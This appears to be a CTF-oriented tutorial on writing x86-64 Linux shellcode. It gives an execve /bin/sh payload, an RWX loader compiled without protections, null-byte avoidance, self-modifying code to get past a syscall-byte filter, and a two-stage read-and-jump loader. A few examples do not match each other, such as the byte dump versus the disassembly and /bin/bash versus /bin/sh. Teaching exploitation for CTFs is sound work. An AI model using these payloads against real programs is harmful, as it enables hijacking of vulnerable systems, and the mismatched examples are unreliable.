I have faith of who ever reading this article is not a layman, you are probably familiar with CTFs, overflowed the buffer and smashed the stack once, and knowing what you are getting your self into. I assume you know what a CTF challenge is, x86 assembly basics, and using linux.
The term “shellcode” originates from the common objective of an exploit usually
to execute a command shell /bin/sh
. the code is written in an assembly
language.
1#execve("/bin/bash",{NULL},{NULL})
2.text
3.global _start
4_start:
5 mov rax, 0x68732f6e69622f
6 push rax
7 push rsp
8 pop rdi
9 xor eax, eax
10 push rax
11 mov al, 59
12 push rsp
13 pop rdx
14 push rsp
15 pop rsi
16 syscall
Looking at his code for a first time is intimidating, and scary. but once you learn how to read it, writing the shellcode would be the easiest part of the job.
How does it execute
shellcode is simply executable bytes, it is a machine instructions assembled to perform a small task once control is hijacked.
In today’s computers, there are two architectures, Von Neumann, which sees and stores code as data. And Harvard architectures that stores data and code separately.
almost all general purpose architectures (x86, ARM, MIPS, etc..) are Von Neumann. That would be the focus of this article.
Starting out, we will use a simple shellcode loader to test and execute our shellcode.
1#include <stdio.h>
2#include <sys/mman.h>
3#include <unistd.h> // for read()
4
5int main(void) {
6 // 1. Allocate an executable memory page.
7 // PROT_READ | PROT_WRITE | PROT_EXEC: The memory can be read, written to, and executed.
8 // MAP_PRIVATE | MAP_ANON: The mapping is private to this process and not backed by a file.
9 void *page = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANON, -1, 0);
10
11 if (page == MAP_FAILED) {
12 perror("mmap failed");
13 return 1;
14 }
15
16 printf("[+] Memory allocated at: %p\n", page);
17
18 // 2. Read shellcode from standard input (stdin) into the allocated page.
19 printf("[+] Reading shellcode from stdin...\n");
20 ssize_t bytes_read = read(STDIN_FILENO, page, 4095);
21
22 if (bytes_read <= 0) {
23 perror("read failed or no input provided");
24 return 1;
25 }
26
27 printf("[+] Read %ld bytes. Executing now...\n", bytes_read);
28
29 // 3. Create a function pointer to the page and call it.
30 // This transfers execution to the shellcode.
31 void (*shellcode_func)() = page;
32 shellcode_func();
33
34 // This line will likely not be reached if the shellcode exits.
35 return 0;
36}
Shellcode is just bytes. If you want to execute it, those bytes must live in memory marked as executable.
the mmap
call is important, if we requested a memory without PROT_EXEC
The
moment the program tried to execute the code at page, the CPU’s memory
management unit would see the “No-Execute” permission on that memory page and
trigger a protection fault, resulting in a SIGSEGV
.
We are asking for a single page (0x1000 bytes) of memory that is
- Writable: we load shellcode bytes into it using
read
- Executable: the CPU will happily
jmp
into it without complaining.
1void *page = mmap(
2 NULL, // Let the kernel choose the address
3 4096, // One page = 4096 bytes (common page size)
4 PROT_READ | PROT_WRITE | PROT_EXEC, // Permissions: read, write, execute
5 MAP_PRIVATE | MAP_ANON, // Private mapping, not backed by a file
6 -1, // File descriptor (-1 since it's anonymous)
7 0 // Offset (not used here)
8);
The code is not compiled using the default gcc
configuration, by default,
modern compilers have protection against shellcode, you need to disable when
compiling the program.
gcc -ggdb -g3 execute.c -fno-stack-protector -z execstack -no-pie -fno-pie -o execute
Using checksec, we see the Stack: Executable
. That means that the data on the
stack could be treated as code.
$ pwn checksec --file=execute [*] '/tmp/test/execute' Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX unknown - GNU_STACK missing PIE: No PIE (0x400000) Stack: Executable RWX: Has RWX segments SHSTK: Enabled IBT: Enabled Stripped: No Debuginfo: Yes
Writing Shellcode
Before i start to write shellcode, i open loads documentation, syscall tables, and the manual for whatever assembly architecture i am writing. To mention a few, I use the Systrack: Linux kernel syscall tables for system calls lookups. And felix cloutier’s x86 and amd64 instruction reference, It’s easier to navigate, but the offical intel manual also works.
When writing shellcode, your goal is to execute Syscalls. Syscalls = system calls. They’re the special functions your program uses to talk to the kernel.
read
to ask kernel to read from a file.write
to ask kernel to write to a file.execve
to ask the kernel to run another program.exit
to tell kernel you’re done and exit cleanly.
Syscalls are functions, like any other functions, the take parameters. It is not
as easy as function(arg1, arg2, arg3)
, but you learn to do it.
Call convention for x86 and x86_64 architechtures:
ARCH | RETURN | ARG0 | ARG1 | ARG2 | ARG3 | ARG4 | ARG5 |
---|---|---|---|---|---|---|---|
x86 | eax | ebx | ecx | edx | esi | edi | ebp |
x64 | rax | rdi | rsi | rdx | r10 | r8 | r9 |
To execute shellcode, You lookup the syscall number you want, the simplist
example is exit()
syscall, looking it up in a man
page you find this
definition
exit - cause normal process termination
#include <stdlib.h>
[[noreturn]] void exit(int status);
It takes only one parameter, exit status. On unix-like systems, a successful
exit is exit(0)
, so lets write that in shellcode. Never mind the first 3
lines, they are important for the compiler not for us for this case.
1.intel_syntax noprefix
2
3.global _start
4
5_start:
6 mov rax, 60 # syscall for exit
7 syscall # execute the shellcode
Compile the shellcode using the following.
gcc -nostdlib -static hello.S -o hello.elf
This will create an elf
file, inspect it and see the disassembly code.
objdump
.
$ objdump -d -Mintel hello.elf
hello.elf: file format elf64-x86-64
Disassembly of section .text:
0000000000401000 <_start>:
401000: 48 c7 c0 3c 00 00 00 mov rax,0x3c
401007: 0f 05 syscall
We only want the .text
section of the elf
file. to extract it use objdump
objcopy --dump-section .text=hello.bin hello.elf
Use xxd
to get compiled code
1$ xxd hello.bin
200000000: 48c7 c078 0000 00bb 0200 0000 4831 db6a H..x........H1.j
300000010: 785f x_
You can run the elf
file just like any other linux program. it exits with
status 0
, to check the status echo $?
.
1./hello.elf
2echo $?
3# 0
For more logging use strace
to see the syscall
s get executed.
1strace ./hello.elf
2# execve("./hello.elf", ["./hello.elf"], 0x7ffe3fbd8560 /* 73 vars */) = 0
3# exit(0) = ?
4# +++ exited with 0 +++
Now enough with long introduction, Lets get into the notes.
Problems you would run into when writing shellcode
Here are some of the common problems that you will run into eventually when you are writing shellcode.
Size constraints (Byte budget hell)
Your goal is to use the smallest number of bytes as possible.
XOR Instruction
Be careful of using mov
too much. To zero out a register, do not use the
instruction mov
. Use xor
instead.
1mov al,0x0 ; b0 00
2mov ax,0x0 ; 66 b8 00 00
3mov eax,0x0 ; b8 00 00 00 00
4mov rax,0x0 ; 48 c7 c0 00 00 00 00
5
6xor al,al ; 30 c0
7xor ax,ax ; 66 31 c0
8xor eax,eax ; 31 c0
9xor rax,rax ; 48 31 c0
Push Pop
push
something to the stack, and get it back by using pop
1;; 7 bytes
2mov rax, 0xbadc0de ; 48 c7 c0 de c0 ad 0b
3
4;; 6 bytes
5push 0xbadc0de ; 68 de c0 ad 0b
6pop rax ; 58
Use what you have
When you hijack the control flow of the code (e.g jmp rax
) you may already
have some values stored at the registers. for example, when using the read
syscall, and rdx
has a non-zero value. Use it as it is as the parameter
count
. It is a sitiuation dependent but you get the point.
Strings
If you think strings are hard in C, well let me introduce you to x86_64.
I will use open
syscall as an example.
1# open("/flag", O_RDONLY)
2mov rbx, 0x67616c662f # push /flag filename
3push rbx
4mov rax, 2 # open() syscall
5mov rdi, rsp # point to first item on stack ("/flag")
6mov rsi, 0 # NULL the second arg (O_RDONLY)
7syscall # open("/flag", NULL)
This 0x67616c662f
is /flag
. it’s in little endian. to reproduce it you have
to run the following command.
1echo -ne "/flag" | rev | xxd -p
2# 67616c662f
The down side is you will struggle with long strings as it may not fit in the registers. One other way using labels, I prefer this way but it may not always work.
1# open("/flag", O_RDONLY)
2push 2
3pop rax # open syscall = 2
4
5lea rdi, [rip+flag] # flag string
6xor rsi, rsi # O_RDONLY = 0
7
8syscall
9
10flag:
11 .string "/flag"
There is also building the string on the stack. almost always work, but it requires lots of work.
1# open("/flag", O_RDONLY)
2# push "flag" little endian to stack
3push 0x67616C66
4pop rax # rax = 0x0000000067616C66
5
6# shift left 8 bits to make room for the '/' byte
7shl rax, 8 # rax = 0x00000067616C6600
8# load '/' (0x2F) into rbx using push/pop
9push 0x2F
10pop rbx # rbx = 0x...0000002F
11
12# OR the '/' into the low byte
13or rax, rbx # rax = 0x00000067616C662F
14# push the 64-bit qword (stack gets "/flag\0\0\0" in little-endian)
15push rax
16
17push 2 # open syscall
18pop rax
19
20lea rdi, [rsp] # filename = "/flag"
21xor rsi, rsi # mode_t = O_RDONLY
22
23syscall
Input filtering
Input maybe manipulated, filtered of some bytes before execution.
String termination & \x00
ull bytes
One great resource i found is nets.ec/Shellcode/Null-free which has many great examples.
- Use xor instruction instead of
mov
This will use less bytes and not include null bytes.
1# bad
2mov rax, 0
3
4# good
5xor rax, rax
- Use push and pop instructions instead of
mov
1push 0x70
2pop rax
3syscall
- Use shifting instructions
1mov rdi, 0x68732f6e69622f6a ; move the 64-bit immediate into RDI ('hs/nib/j' in little-endian)
2shr rdi, 8 ; logical right-shift RDI by 8 bits -> zero-terminates the low byte
3push rdi ; push the 64-bit value (now contains "/bin/sh\0" when viewed as bytes)
4push rsp ; push current RSP (stack pointer)
5pop rdi ; pop that value into RDI -> RDI points at the pushed string
Self modifying shellcode
One time i was solving a ctf challenge, and it filters the syscall
bytes
0F 05
. I wrote a shellcode that constructs the syscall
bytes 0F 05
at
runtime so it won’t be filtered. The following code increments the 0e
by 1, so
it becomes 0F
and this way it bypasses the filter.
1inc BYTE PTR [rip]
2.byte 0x0e, 0x05
NOP Padding
nop
is an instruction that does nothing, sometimes you use it for padding,
aligning or whatever reason, it is useful.
1.global _start
2
3_start:
4 # Your code here
5 nop
6 nop
7 #...
8 nop
9
10 .fill 10, 1, 0x90 # 10 NOP instructions
11 # or
12 .rept 10
13 nop
14 .endr
15
16 # More code here
Multi stage shellcode
Some times there will be input filtering that it is impossible to write shellcode to do anything meaningful. One way to solve this problem is a multi stage shellcode. Write a stage 1 shellcode “Loader” that its job is to load another shellcode. Only the stage 1 gets filtered.
1push 0
2push 0
3pop rax # read syscall
4pop rdi # stdin
5
6push rsp
7pop rsi # rsi = rsp (buffer)
8
9push 100
10pop rdx
11
12syscall
13
14jmp rsp
Use Pwntools when possible
it has lots of functions that automates and eases the process of writing shellcode. sometimes you don’t need to write shellcode at all, it does it for you. But first you have to understand how the magic works, if not you will waste a lot of time. RTFM.
Pwn shellcraft
1pwn shellcraft -l #List shellcodes
2pwn shellcraft -l amd #Shellcode with amd in the name
3pwn shellcraft -f hex amd64.linux.sh #Create in C and run
4pwn shellcraft -r amd64.linux.sh #Run to test. Get shell
Pwn template
i like to use pwn template
command to generate a starting point for my
challenges.
then use the asm("")
function to write the shellcode instead of compiling and
passing it by hand through the shell.
1stage1 = asm("""# shellcode loader""")
2stage2 = asm("""# actual shellcode""")
3
4io.sendline(stage1)
5pause(1)
6io.sendline(stage2)
7
8io.interactive()
GDB Debugger
Using a debugger is essential. gdb
is good but it lacks features, that is why i
recommend using pwndbg
or gef
with it. they help with visualisation and
provide functions that are useful for debugging.
1gdbscript = f'''
2
3# break points
4#...
5
6source /opt/gef/gef.py
7continue
8'''
References
- https://shell-storm.org/shellcode/index.html
- https://pwn.college/program-security/program-security/
- https://www.felixcloutier.com/x86/
- https://syscalls.mebeim.net/?table=x86/64/x64/latest
- https://www.abatchy.com/2017/04/shellcode-reduction-tips-x86
- https://nets.ec/Shellcode/Null-free
- https://book.hacktricks.wiki/en/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html